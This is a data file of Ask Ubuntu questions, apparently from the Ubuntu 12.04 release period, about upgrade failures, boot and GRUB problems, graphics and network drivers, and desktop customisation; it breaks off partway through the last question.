126179	lock folders by password , is there easy way ? any program ?	something without creating new filesystem/emcrypted-partition , do you know a good program ? thanks !
126180	compiz in precise 12.04 - unity 2d	i 'm looking to be able to tweak some things in unity 2d . i have an older machine with a celeron m 2.2ghz and only 2gb ram , so some things bog it down - like unity 3d ( although i have n't tried it in 12.04 . should i ? ) my question is this , can i use compiz or metacity or some other solution to change the size of the icons in the launcher , for example ? i 'm very happy with the speed of my machine in unity 2d , but when i tried unity 3d in 11.10 , it ran veeeerrrry slowly . thank you , in advance !
126184	i ca n't backup system to disk , options do n't help 11.10ubuntu linux	i ca n't backup to dvd ? program options do n't help . ubuntu 11.10 linux
126188	is there a way to select the 1st unity search result with 1 keystroke ?	in this example i 'd like to select ubuntu software center . i know you can press down arrow twice to select , but the extra key seems unnecessary . in old versions of ubuntu i remember using tab , but that no longer seems to work .
126189	how do i fix a `` hash sum mismatch '' error ?	i 'm trying to upgrade from 11.10 to 12.04 using the update manager . i keep getting the following error : - could not download the upgrades the upgrade has aborted . please check your internet connection or installation media and try again . all files downloaded so far have been kept . failed to fetch http : //gb.archive.ubuntu.com/ubuntu/pool/main/i/indicator- datetime/indicator-datetime_0.3.94-0ubuntu2_i386.deb hash sum mismatch i have tried rerunning the update manager a number of times and i always get the same error . a reboot had no effect . any ideas on how to fix ?
126190	11.10 to 12.04 upgrade video issues	i was using ubuntu 11.10 without any difficulties now after the upgrade , during boot up i get a message indicating ubuntu can not figure out my monitor or video card settings should be and goes to low res . i get a login prompt but since i am new i am used to the gui . i am not sure how to get to the gui or how to fix this issue . please help me asap . thanks in advance ! system info : asus m4a89gtd pro/usb3 am3 amd 890gx sata 6gb/s usb 3.0 hdmi atx amd motherboard , amd phenom ii x4 955 black edition deneb 3.2ghz socket am3 125w quad-core processor hdz955fbgibox , using philips 55 '' hdmi input 2 as my monitor .
126193	12.04 stuck at the login screen	i did fresh installs of ubuntu 12.04 on all my computers yesterday and one of them just does n't seem to like 12.04 . let 's start with the symptoms : i initially tried installing through a usb flash with the desktop amd64 version . since it had worked on all other ( 5 ) computers , i believe the usb flash drive was ok . however the computer seemed to be stuck after the ubuntu gui came up ( bar on the top , pinkish background ) but before the screen prompting to try or install . when the screen came up , the mouse was moving exceptionally slowly , i.e . it responded 2-3 seconds after i had moved it . after a few minutes , i could move the mouse with normal speed , but could not click anything . the try/install window never came up . the same thing had happened a few days ago when i had tried to install ubuntu 12.04 beta 2 on the same computer , but when the try/install screen kept failing to come up , i gave up . i assumed it was a problem with the desktop installer , so i tried the alternative installer , which worked fine . but then , the same ( or possibly a similar ) problem appears on the login screen : the mouse moves very slowly in the first few minutes , then it moves normally , i can not click anything ( for example the buttons on the top right ) , and i can not type in my password to login or select the guest session . so i am stuck at the login screen . i did not encounter any problems on my other computers , so here are some specs of this one : cpu : intel i7 980x extreme edition , motherboard : asus rampage iii extreme , ram : 6gb , gpus : 2x nvidia gtx 580 in sli , hdd : western digital 1tb green power ( 20gb for root ( / ) , 6gb for swap , all the rest for /home ) i should also note that this pc ran 11.10 flawlessly until yesterday , when i attempted to install 12.04 . i tried installing 11.10 after i failed with 12.04 and it worked again , so its definitely something related to 12.04 . unfortunately , due to the nature of the problem , i do n't know how to provide any logs , but if there is some way let me know .
126194	how to run .jar files with sun java 6 ?	i can not seem to open minecraft.jar from the file browser . everytime i try , i select open with , then sun java and nothing happens . i 've tried the terminal too , but that fails and just reports a load of errors . can somebody help me ?
126198	how to install dropbox ?	for some reason installing dropbox via software center does not work . i get a message that sends me to dropbox website where i follow the instructions . but at the end it says it says : next , run the dropbox daemon from the newly created .dropbox-dist folder . i am not able to do this . running the command ~/.dropbox-dist/dropboxd fails for me . running ubuntu on windows 7 home edition .
126201	eclipse shows blank screen after upgrading to 12.04	i 've purchased a netbook for android app development . i use eclipse for this . it used to work great . yesterday , i upgraded to 12.04 and everything works great , but eclipse does n't start anymore . it just shows a blank screen , which i ca n't click away . i 'm not really an extremely technical guy , but i really need this to work . and yes i 've removed and re-installed eclipse .
126202	kubuntu 11.10 to 12.04 upgrade wipes out grub	three ubuntu based systems installed on external drive ; boot from external drive . upgrade kubuntu system from 11.10 to 12.04 wiped out grub . attempt to boot from external drive results in grub reporting no partition found three times . grub reinstall attempts on my part result in failure with ' can not stat aufs ' message . request assistance to restore grub .
126205	alt+tab not switching between windows on 12.04	alt+tab is not switching between windows . while on a terminal , when i tried alt+tab , it only showed the effect of tab which was : display all 1784 possibilities ? ( y or n ) my alt is working fine as to get the panel menu , i have to do alt+right-click . why is n't alt+tab working ? i 'm using gnome classic and not unity .
126217	12.04 boots to black screen	i have downloaded the last release of ubuntu 12.04 and when i wanted to install it from the live cd it freeze and display a black screen after choosing install so i tried the boot option `` acpi=off '' then the live cd boot and i installed the ubuntu successfully , after the restart ubuntu ca n't boot and the same problem appeared even when editing the boot options `` acpi=off '' , so now i do not know how to solve this problem and what cause it .
126219	can not install ubuntu 12.04	i can install any ubuntu version up to 11.10 64bit , but trying to upgrade the system became unstable after grub , the mouse keeps jumping . when i try to install from the disk , the only thing tha i see is a pic of a keyboard and a man , few secondas later just a dash blink . i upgrade others computer with 12.04 32bit without problem . i have a intel duo core quad 6700 - 4 gig memory - ti 560 2gig memory and hd seagate , other wd and dvd rw . as i have dualboot with comice os 4 i could backup all files . what is wrong with my system ? thank you dataflowusa
126221	12.04 ui problems	i just distro upgraded to 12.04 . i hoped that this time i wo n't have to suffer a whole night to get everything working , but my hopes were shot down quite quickly . the ui in 12.04 is seriously broken , and i do n't know why . the unity animations are slow or not there at all . the launcher reacts only like every third time i try to get it to show ( i have it on auto-hide ) . neither the application switcher ( alt-tab ) nor the workspace switcher look as they should . i ca n't take a screenshot of either . the app switcher only looks bad ( like a win98 default skin ) , it works . the workspace switcher ( expo ) does n't really . it opens without animation , and all the windows are displayed on the workspace in a grid , not just the top one . they ca n't be moved either . it also seems to ignore my settings that there should be 2*3 ( total 6 ) workspaces , and only displays 5 . i get the feeling that this is due to some config clash from the upgrade . is there any way i can fix it ? if there 's a way to nuke all settings or the whole gui and reinstall it clean and clear , i 'm fine with that too .
126225	virtualbox guest additions in 12.04 and vbox 4.1.14 ( windows 7 host )	it would appear it 's impossible to get virtualbox guest additions working in a windows 7 host running vbox 4.1.14 and an ubuntu 12.04 32-bit guest . i 've tried the standard .iso , the .run file , and the official ubuntu virtualbox-ose-guest packages.. none of them allow me to turn on seamless mode or use copy/paste . any help would be much appreciated !
126227	12.04 wired network does n't work rtl8111/8168b	its a fresh 12.04 install 64bits . wifi works fine , wired stays off with cable connected and network-manager shows as if cable is disconnected . turning off networking lights up my network-cards leds , turning networking on shuts off the leds and no communication is possible . i already tried , turning off the network-manager ( sudo service network-manager stop ) and setting up my eth0 manually , as soon as i switch off the network-manager my leds light up , but after setting up manually eth0 ( sudo ifconfig eth0 10.2.10.114 netmask 255.255.0.0 up ) the leds turn off again . i am still dual booting with 10.04 where i have no issues at all , leaving the cable connected all time to my notebook and a switch . here is some hardware info : lshw : *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 03 serial : c8:0a : a9 : d7:05:97 size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl_nic/rtl8168d-2.fw latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:42 ioport:2000 ( size=256 ) memory : f0004000-f0004fff memory : f0000000-f0003fff memory : f0010000-f001ffff lspci : 02:00.0 network controller : atheros communications inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 ) 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 03 ) ifconfig eth0 : eth0 link encap : ethernet hwaddr c8:0a : a9 : d7:05:97 inet addr:10.2.10.114 bcast:10.2.255.255 mask:255.255.0.0 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:42 base address:0xc000 cat /etc/network/interfaces : ( already tried here with and w/o eth0 ) auto lo eth0 iface lo inet loopback cat /etc/networkmanager/networkmanager.conf [ main ] plugins=ifupdown , keyfile dns=dnsmasq [ ifupdown ] managed=false any help is welcome ; ) laket
126229	stuck at 'vmware easy install '	i have a mac os x and vmware fusion . i did a fresh install of 12.04 . i do not have vmware tools installed . i read that i do not have to log in at the command window , that i have to wait for vmware tools to get installed . it seems like something is wrong .
126231	system wo n't start after installation of nvidia drivers	i 've installed the ubuntu 12.04 . but the problem is when i try to install the nvidia driver , i chose recommended version and when installation finishes , i reboot my system but all i see is a black screen and system does n't starts and stays on a black screen also the mouse ca n't move . i 've tried 3 times but problem continues . how can i solve this problem ?
126232	how to move the window buttons from right to left in gnome 3 using ubuntu 12.04 ( precise pangolin )	i have ubuntu 12.04 installed with gnome 3 shell . i 'm used to the window buttons being on the left side of the window from unity and would like to incorporate this feature into my gnome setup . i 've tried advanced settings from the software center but there 's no option to move the location of the window buttons . any thoughts ?
126233	how to set a shortcut for `` always on top '' for window ?	in 12.04 ( unity ) , i would like to assign a shortcut to the `` always on top option '' for a window . probably something like ctrl+shift+home to turn on and ctrl+shift+end to turn off , or whatever . is there an option to do this somewhere in the compiz settings manager ? this ( old ) post claimed that for compiz , enable extra wm actions . check the properties , and insert alt+a to key field for toggle always-on-top action . but i could n't find that .
126234	no upgrade to 12.04 for uk ?	i am running 11.04 linux ubuntu on my toshiba computer ( 32 bits ) . in the settings for update manager , i did put notifying me for any new version , but since yesterday evening it 's not showing me any release ! i do not know why ? i did select main server , and united kingdom server but no chance it does show it ! ? i do not want to use the terminal but the interface , and i do not understand why ? ! any reason ? plus i do have a toshiba 32 bits , 1.8 hyper treading core 2 duo ( 1 processor but 2 virtuals one ) and 2 gb ram 833 ghz and a 250 gb hardrive , and share graphics card . i was wondering if it will be slower if i do upgrade from the version as i am now 11.04 to 12.04 ? it 's running fast enough , and i do not want it slower but hud is a pretty nice function . thanks for your future answer , sign by a microsoft employee that prefer linux : )
126235	error on ubuntu server ? [ canonical not handling load ? ]	with update manager i got : failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/libu/libunity/gir1.2-unity-5.0_5.12.0-0ubuntu1_amd64.deb 404 not found [ ip : 91.189.88.28 80 ] and then later : failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/libu/libunity/libunity9_5.12.0-0ubuntu1_amd64.deb 404 not found [ ip : 91.189.92.151 80 ] i think it said to check your internet connection . is it really a problem on my end ? i think it probably is at canonical 's . either they are not handling the load or some ( these ip 's ) of the servers are not set up correctly . i 'm not sure where to report this or even that i 'm right . if i am will someone from canonical see this ( i do n't have a problem myself , i could download these with trying repeatedly ) - i just wanted to help then . [ this is my first question here , i was n't sure what tag to use , someone could change ? ] p.s . some of the mirror servers ( in iceland ) seem to be behind ( did n't have these updates ) . i guess that is normal .
126238	ubuntu 12.04 does n't start after installing with liveusb	i installed ubuntu with my liveusb , and it said to restart in order to use your system , so i restarted . now , i am just stuck in a completely black screen with a blinking _ underscore cursor . i have already waited 10 minutes for something to happen , but there is no response from the computer . i do n't know what the problem could be , but maybe the message i got during installation that said apt could n't be configured , so no additional apps will be installed was the problem ? thanks .
126239	why is shift+backpace logging me out ?	ever since my update to 12.04 , shift+backspace ends my x session/logs me out . how can i stop this ?
126249	ubuntu 12.04 wo n't boot on samsung series 9 np900x3a ( ssd hard-drive )	i 've recently bought the samsung series 9 np900x3a i boot the live usb ubuntu 12.04 and format the ssd drive . i then created 2 partitions : 28gb for / and 100gb for /home after install i reboot the laptop . it seams that on boot the screen blicks and restarts again . i 've also made the regular ubuntu 12.04 install without any luck . any idea ?
126251	extremely slow boot	i am having difficulty finding a fix for my slow boot . along with ubuntu taking long time to boot it also will sometimes not load and after restart and on boot . i am running ubuntu 12.04 lts . 64-bit . dell xps m1730 . i am extremely new to linux so there may be an easy fix for this . i may end up having to reinstall ubuntu . i was trying to avoid that . [ 3.374844 ] input : broadcom corp as /devices/pci0000:00/0000:00:1a.0/usb3/3-2/3-2.3/3-2.3:1.0/input/input9 [ 3.374936 ] generic-usb 0003:0a5c:4503.0005 : input , hidraw4 : usb hid v1.11 mouse [ broadcom corp ] on usb-0000:00:1a.0-2.3/input0 [ 7.977885 ] ext4-fs ( sda1 ) : info : recovery required on readonly filesystem [ 7.977888 ] ext4-fs ( sda1 ) : write access will be enabled during recovery [ 9.336852 ] ext4-fs ( sda1 ) : recovery complete [ 9.337253 ] ext4-fs ( sda1 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 19.007787 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 19.093301 ] ext4-fs ( sda1 ) : re-mounted . opts : errors=remount-ro [ 19.108582 ] udevd [ 498 ] : starting version 175 i 'm getting anywhere from 50 to 200 seconds of boot time . on average im getting more errors like : addrconf ( netdev_up ) : eth0 : link is not ready i have gotten up to 4 of these errors in one boot . i am assuming once i fix one error all of them should clear up . i have searched forums , but all i see is temporary fixes and hardware issues . i have tried shutting off my wireless , disconnecting all usb drives , and disconnecting my network cable all have been without success or change in boot time . i have seen alot of fourms with people who are getting the same error and they have a long shutdown time . my shutdown time is where it should be takes about 10 seconds ( max ) to shutdown . any help is appreciated .
126252	burning ubuntu 12 image file on dvd in imac	i downloaded the iso image and on my imac , i burnt it to a dvd , but my imac claimed that dvd is not readable , i put the same dvd on a windoes machine and it shows the contents of dvd fine . then i put back the dvd on my imac and restart and once i see the black screen , where ubuntu should load and start installation , nothing happens , the black screen stays forever . any ideas how i can install ubuntu on my imac using dvd ?
126253	apache2 web server only recognized locally , does not work externally	i just installed apache2 this morning and am able to start the server and correctly pull up the sample webpage at http : //localhost . i am behind a router so i set the router up for port forwarding to the proper server computer . however , when i enter http : // to access my page into my browser , it does not work , and says server not found . can anyone please suggest what might be the problem here ? this is a typical installation of desktop ubuntu 12.04 .
126254	12.04 upgrade stops at 'mysql restarting '	after downloading the upgrade started but the script stopped at 'mysql restarting ' . what should i do now ? the system does n't launch any application and does n't accept any commands . should i reboot and hope for the best ?
126263	update manager and terminal is not working	i tried due to previous questions to update in all ways for the new releases 12.04 . i tried with update manager and terminal but it 's telling me there is no update . find bellow the result of terminal command administrator @ bang007 : ~ $ uname -a linux bang007 3.0.0-19-generic # 33-ubuntu smp thu apr 19 19:05:57 utc 2012 i686 i686 i386 gnu/linux administrator @ bang007 : ~ $ uname -r 3.0.0-19-generic administrator @ bang007 : ~ $ do-release-upgrade checking for a new ubuntu release no new release found administrator @ bang007 : ~ $ administrator @ bang007 : ~ $ cat /proc/version linux version 3.0.0-19-generic ( buildd @ vernadsky ) ( gcc version 4.6.1 ( ubuntu/linaro 4.6.1-9ubuntu3 ) ) # 33-ubuntu smp thu apr 19 19:05:57 utc 2012 administrator @ bang007 : ~ $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 11.10 release : 11.10 codename : oneiric and it doesnt find the update ? ? ? ? i am lost now ! any help ?
126267	unable to boot my system after upgrading to 12.04	i was doing upgrade from 11.10 to 12.04 , it showed some error . then i restarted the system . now it 's not booting . it 's showing the following error when it starts and reboot by itself . sed : /lib/x86-64-linux-gnu/libc.so.6 : version 'glibc_2.14 ' not found ( required by /lib/x86_64-linux-gnu/libselinux.so.1 ) please please reply back with some solutions . i am kind of stuck not able to use the system . i need it so badly .
126268	how to find out the terminal command of an application ?	i want to use some applications shown on the unity launcher in a terminal , but i need to know the appropriate command to run them . how can i achieve that ?
126269	vpn connection is not working properly after installing 12.04	i 've done a clean install of ubuntu precise . i 'm living in a country in which my access to many websites are restricted and i usually use vpn connections to access these websites . i use the default gnome-network applet for this purpose and my connection type is pptp . everything was ok until i installed ubuntu 12.04 . now after creating the vpn connection i can get it connected but the problem is , it 's like it 's not there at all . i can access the unrestricted websites easily but when it comes to restricted websites i ca n't get through ! i checked my ip and it 's changed accordingly . the vpn server is ok as i checked it on windows . i wonder what is the problem here ?
126275	ca n't login after using ubuntu tweak	i updated my system to ubuntu 12.04 . it was running great . i decide to download ubuntu tweak and do some housecleaning . after reboot when i try to login nothing happens except a `` logging in '' message . this happens with all options including gnome 3.4 . what should i do ?
126286	unable to login as root from the login screen even though i have a root account	i have installed 12.04 lts but surprisingly not able to login as root . i have unlock and set the password for root but while login i can not see 'other ' option in gui login where i can put root id and password . please help me .
126289	unauthenticated packages after upgrade to 12.04	i upgraded an 11.10 box to 12.04 yesterday . this morning i tried to run an apt-get upgrade and encountered the following : sudo apt-get upgrade [ sudo ] password for brian : reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : linux-generic linux-headers-generic linux-image-generic the following packages will be upgraded : apport apport-gtk firefox firefox-globalmenu firefox-gnome-support firefox-locale-en linux-libc-dev python-apport python-problem-report unity-scope-musicstores 10 upgraded , 0 newly installed , 0 to remove and 3 not upgraded . need to get 20.1 mb of archives . after this operation , 594 kb of additional disk space will be used . do you want to continue [ y/n ] ? warning : the following packages can not be authenticated ! python-problem-report python-apport apport apport-gtk linux-libc-dev unity-scope-musicstores any help is greatly appreciated . thanks !
126291	what does this error mean : âmaverick is not supported.â when installing appscale ?	i am trying to install appscale on a cluster , and i 'm running this command : debian/appscale_build.sh when i get this error : maverick is not supported what does this mean ? i am unable to understand it . this is my ubuntu details : lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 10.10 release : 10.10 codename : maverick
126295	how do i enable global menus and fix hud ( after upgrading to 12.04 from 10.04 ) ?	i upgraded from ubuntu 10.04 lts to 12.04 lts . it 's more or less working . but , global menus are n't working , and when i use hud no results ever appear . ( example : i search for `` f '' ( without the quotes ) ) and nothing is found in any application ( terminal , home folder , ... ) i already did : sudo apt-get install appmenu-gtk appmenu-gtk3 appmenu-qt then restarted , but nothing . any ideas ? i deleted ~/.config , ~/.gnome2 , ~/.compiz-1 , ~/.icons and a dozen other such directories ( obviously not recommended , but whatever ... ) , restarted , and still no change . i have a nvidia geforce gt 430 and am using the `` post release updates '' provided by the additional drivers panel in system settings . maybe this is related ? uninstalled the drivers mentioned , rebooted using whatever vanilla detection scheme ubuntu has going on , no change .
126297	new problems installing ati-catalyst driver in 12.04 lts	this is relation [ to a previous question i asked here that was described ] [ 1 ] as an exact duplicate . i started following the instruction given and i am getting below messages in terminal reading state information ... done e : unable to locate package dkgcc1 e : unable to locate package libc6-i386ms e : unable to locate package > lib32 [ here is the full terminal transcript ] [ 2 ] i am not technical but if its any help my machine is 64bit from ubuntu community documentation ( for v 12.4 ) ubuntu 12.04 precise : sudo sh amd-driver-installer-12-4-x86.x86_64.run -- buildpkg ubuntu/precise if it is required , a package manager window will open and install some dependencies and after a while create the following four .deb packages : fglrx_8.961-0ubuntu1_amd64.deb fglrx-amdcccle_8.961-0ubuntu1_amd64.deb fglrx-dev_8.961-0ubuntu1_amd64.de note : it will also create a file called fglrx-installer_8.961-0ubuntu1_amd64.changes . if you wish you can read this file to know the changes that have been effected through amd/ati catalyst 12.3 and related information . to install the created .deb files , type : sudo dpkg -i *.deb note : in case any of the packages are broken , open synaptic package manager and go to edit - > fix broken packages . in case you are new to ubuntu , broken here means that some dependent packages are not yet installed . once you sort out the issue as indicated above through the synaptic package manager , the problem of broken packages should be resolved . continuing with the installation , type : sudo aticonfig -- initial after this command , reboot your system . if all is right , the fglrx driver that corresponds to amd/ati catalyst 12.3 will be installed and working on your system . to confirm the drivers are working open a terminal and type : fglrxinfo you should get an output similar to the following : display : :0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : ati radeon hd 4300/4500 series opengl version string : 3.3.11631 compatibility profile context any help welcome [ 1 ] : what is the correct way to install ati catalyst video drivers in 12.04 lts ? : [ 2 ] : http : //pastebin.com/r5pgyevt
126298	webgl stop working after update to ubuntu 12.04 lts	i have been developing something in webgl , and before the update i was able to run it on firefox ( opera and chrome fails , for some reason ) . after the update to latest ubuntu version it has stopped working . in the same computer i have vista installed and webgl works in chrome , firefox and safari , so i guess that the grapic card is ok . i have tried changin the driver ( is an nvidia ) , but stil fails . thanks in advance ! !
126300	how do i configure the gnome panel from a script ?	i can easily set the number of workspaces and the workspace names with the gconftool-2 , as follows : gconftool-2 -- type int -- set /apps/metacity/general/num_workspaces 4 gconftool-2 -- type string -- set /apps/metacity/workspace_names/name_1 dev gconftool-2 -- type string -- set /apps/metacity/workspace_names/name_2 docs gconftool-2 -- type string -- set /apps/metacity/workspace_names/name_3 vm gconftool-2 -- type string -- set /apps/metacity/workspace_names/name_4 web however , for some reason i am unable to use similar techniques to set the number of rows in the workspace switcher , or set the preference to show workspace names . i am similarly unable to add applets and launchers via gconftool . i would also like to be able to configure my system to have just one panel at the bottom of the screen . ( solved this much ) i have reviewed the using gconf page without success . for some options , i have been successfully able to find the option name by dumping gconftool-2 -r / to a file , change the option via the gui , and then dump again and diff . this technique was not fruitful with the above mentioned items . i have also tried -- dump and -- load , and have tried restarting gnome-panel and gconfd-2 , but that does not help either . is there some other mechanism besides gconftool-2 that the panel uses for storing settings ? i am currently using 11.10 in gnome-classic mode . update : found a script to hide panels . update 2 : an easier way to remove the top panel : gsettings set org.gnome.gnome-panel.layout toplevel-id-list `` [ 'bottom-panel ' ] '' i actually still can not configure the panel with dconf . i can change an existing panel item to point to a different program via dconf write /org/gnome/gnome-panel/layout/objects/object-6/instance-config/location `` ' ... ' '' , but killall -hup gnome-panel is also required . if i try to remove an item from the panel via dconf write /org/gnome/gnome-panel/layout/objects/object-id-list `` [ ... ] '' , the contents of the panel do not change , even after restarting gnome panel . if i make the same change with dconf-editor , it changes immediately . what do i need to do to update the panel after dconf write ? ( note : behaves the same way under 12.04 )
126302	forcing a partial upgrade	i updated to 12.04 yesterday . while it was updating however it crashed . i restarted my computer and update manager asked to perform a partial upgrade . this is not the first time this happened so i said yes . however the partial update also failed . i then had to leave so i turned the computer off , figuring that it 'd ask me for another attempt . however upon opening update manager i do n't have the option to do a partial update ( or any update whatsoever ) . some of my programs are acting up and crashing - so i assume its not updated completely ( new unity works , hud works , just some things crash ) i already tried sudo apt-get update and sudo apt-get install -f - but nothing happened ( except asking to remove 200 mb of files ) . is there a way for me to 'force ' it to partial upgrade ? i do n't want to format if i do n't have to .
126303	after 11.10 > 12.04 upgrade on thinkpad w520 - mouse input broken	after upgrading from 11.10 to 12.04 on a thinkpad w520 system all mouse/pointer input devices ( on this machine that includes the so-called 'trackpoint pointing stick ' , a 'touchpad ' , and , what i actually use , a generic wireless usb mouse ) fail to work properly if the laptop is in it 's docking station . the pointer is 'stuck ' along the left edge of the screen . the pointer can be moved vertically , but not horizontally . if the laptop is removed from it 's docking station then 'mouse ' devices appear to function normally . examining /etc/x11/xorg.conf i see that the 'upgrade-manager ' has commented out all the traditional configuration for the mouse ( and keyboard ) with a pointer to /etc/default/console-setup . looking there , i find nothing that seems to refer to mouse configuration . trolling /var/logs and dmesg for complaints about 'mouse ' does n't turn up anything . in previous ubuntu releases , i have not needed to do anything for the docking station to work . fwiw , my normal set up is the laptop in a docking station with two viewsonic vx2450wm led monitors in a 'twinview ' mode , and a wireless usb keyboard . the laptop itself has a nvidia quadro 1000m graphics device . none of the mouse devices are attached to the docking station . i 'm not sure how or why the docking station relates to mouse input , but it clearly has some impact . this seems like something way too basic to just stop working on an upgrade , but i 'm at a loss to see what the upgrade has messed up . any suggestions of what to look at would be very much appreciated .
126304	can i upgrade from 8.04 to 12.04 ?	how can i upgrade from hardy to 12.04 lts directly ? without doing multiple upgrades i.e to lucid , natty narwhal , oneiric , next upgrade , etc .
126308	there is no freeze cells option in calc	in libreoffice calc , there is no option to freeze cells , on ubuntu 12.04 . i use libreoffice at work for proper odf saving while on windows . in the menus for calc there is `` window '' and within that menu is `` freeze '' which allows you to freeze rows so when scrolling down it stays on top . however , when i press `` alt '' and type `` freeze '' nothing comes up . there is not even a `` window '' menu option ( lo-menubar installed ) . why is this not on libreoffice on ubuntu but on windows ? but i want to know is how can i get this feature . i find it really handy . thank you for your time and answers .
126313	how to disable unity chameleon effect ?	new unity feature changes the colour of the launcher and notifications that matches them to the wallpaper . for me it 's extremely annoying ! external apps like myunity does n't solve this problem . when i change color in myunity it works till i close app , then it 's revert to previous color .
126316	gnome shell issue with application icons using themes	i 've installed gnome shell extensions for precise ( 12.04 ) using the instructions detailed in webupd8 . the problem i have is when i activate the user-themes extension and i install one via the gnome-tweak tool . when i use any other theme that is n't the default , the application icons look too big , like this : any ideas about why this happens ? workarounds ?
126322	error : parsing file '/var/lib/dpkg/status ' near line 55497 package 'indicator-displex '	after running an upgrade from ubuntu 11.10 ( oneiric ocelot ) to 12.04lts ( precise pangolin ) , a window popped up saying that the upgrade failed and that i should run sudo dpkg -- configure -a . running that command gave me : sudo dpkg -- configure -a dpkg : error : parsing file '/var/lib/dpkg/status ' near line 55497 package 'indicator-displex ' : blank line in value of field 'description trying to run apt-get install -f gives me many dependency errors along with that same dpkg error .
126326	upgraded from 11.10 to 12.04 on windows 7 dual boot - now , no boot !	my hp pavilion all-in-one pc has a dual boot with the original windows 7 home premium dual booted with ubuntu 11.10 . whilst booted in ubuntu i upgraded to 12.04 and whilst everything seemed to install ok when it was finished and rebooted i was not presented with the normal grub screen but with a 'gnu grub version 1.99-21ubuntu3 ' screen that gave me options to linux 3.2.0-23generic-pae and several others including 'windows 7 ( loader ) ( on /dev/sda1 ) ' . however , regardless of which option i choose it comes back with 'error : no such partition' i assume that the grub is pointing to the wrong place or corrupt . any ideas how to rectify this and get me back to a bootable system ?
126327	how can i activate hibernate on ubuntu 12.04 ?	i can not select the option to hibernate under energy settings . is there a way to put it back ? ( it worked on ubuntu 11.10 : ( )
126329	scanner epson sx130 is not recognized	i 've got epson sx130 all in one printer . everything was working correctly on ubuntu 10.10 . i upgraded to 12.04 recently and system recognize just the printer now . simple scan shows me yellow bar with message `` no scanners were detected '' or something like that . is there any solution to fix it ? i can not find anything in google . thanks
126330	sending sms in ubuntu	i connect to internet via mobile broadband which is actually a usb 3g modem . how do i use that to send sms . for windows they have provided a software .
126337	alt + tab is not working in gnome shell at ubuntu 12.04	i have installed ubuntu 12.04 and running gnome-shell . so far almost everything went fine , but alt + tab is not working . how can i get alt + tab working ? or there is some other alternative ?
126338	ca n't find mysql-admin package in 12.04 repositories	i 've installed the precise pangolin today . just ca n't find some packages like mysql-admin and libcv-dev ... is there something special about lts repositories ?
126340	how do i set up the iphone usb ethernet driver ?	i just installed 12.04 ( fresh install ) and realized i could no longer tether with my iphone like how i did on 11.10 without any hassle . on 11.10 ( to my amazement ) all i had to do was turn on usb tethering option in mywi and my system would automatically connect to the internet via my phone . what has changed and how can i tether again ? btw it is an iphone 3g ( jailbroken )
126343	totem was deleted in upgrade process and now it have unmet dependencies	what can i do to solve this problem ? error : totem : depends : libnautilus-extension1a ( > = 1:2.91 ) but 1:3.4.1-0ubuntu1 must be installed depends : libtotem0 ( > = 3.0.1-0ubuntu21 ) but 3.0.1-0ubuntu21 must be installed depends : totem-common ( = 3.0.1-0ubuntu21 ) but 3.2.2-0ubuntu1~oneiric1 must be installed
126344	dell studio 1737 overheating	i am using a dell studio 1737 laptop . i have been running linux and have ran windows recently for a very long time . i upgraded to the 10.10 distribution and since that distro , it seems that for some reason all linuxes want to push my laptop to extremes . i have recently upgraded to ubuntu 12.04 since i heart that it contains kernel fixes for overheating issues . 12.04 will actually eventually cool the system , but that is after the fans run to the point it sounds like a jet aircraft taking off and the laptop makes my hands sweat . in trying to combat the heat problems i have done the following : i installed the propriatery driver for my ati mobility hd 3600 . i have tried both the one in the additional drivers and also tried ati 's latest greatest version . if i do n't install this my laptop will overheat and shut off in minutes . both seem to perform similarly , but the heat problem remains . i have tried limiting the cpu by installing the cpufreq indicator . this does help keep the machine from shutting off , but the heat is still uncomfortable to be around the machine . i usually run in power saver mode or run the cpu at 1.6 ghz just to error on safety . i ran sensors-detect and here are the results : sean @ sean-studio-1737 : ~ $ sudo sensors-detect # sensors-detect revision 5984 ( 2011-07-10 21:22:53 +0200 ) # system : dell inc . studio 1737 ( laptop ) # board : dell inc. 0f237n this program will help you determine which kernel modules you need to load to use lm_sensors most effectively . it is generally safe and recommended to accept the default answers to all questions , unless you know what you 're doing . some south bridges , cpus or memory controllers contain embedded sensors . do you want to scan for them ? this is totally safe . ( yes/no ) : y module cpuid loaded successfully . silicon integrated systems sis5595 ... no via vt82c686 integrated sensors ... no via vt8231 integrated sensors ... no amd k8 thermal sensors ... no amd family 10h thermal sensors ... no amd family 11h thermal sensors ... no amd family 12h and 14h thermal sensors ... no amd family 15h thermal sensors ... no amd family 15h power sensors ... no intel digital thermal sensor ... success ! ( driver `coretemp ' ) intel amb fb-dimm thermal sensor ... no via c7 thermal sensor ... no via nano thermal sensor ... no some super i/o chips contain embedded sensors . we have to write to standard i/o ports to probe them . this is usually safe . do you want to scan for super i/o sensors ? ( yes/no ) : y probing for super-i/o at 0x2e/0x2f trying family `national semiconductor/ite ' ... no trying family `smsc ' ... no trying family `via/winbond/nuvoton/fintek ' ... no trying family `ite ' ... no probing for super-i/o at 0x4e/0x4f trying family `national semiconductor/ite ' ... yes found `ite it8512e/f/g super io' ( but not activated ) some hardware monitoring chips are accessible through the isa i/o ports . we have to write to arbitrary i/o ports to probe them . this is usually safe though . yes , you do have isa i/o ports even if you do not have any isa slots ! do you want to scan the isa i/o ports ? ( yes/no ) : y 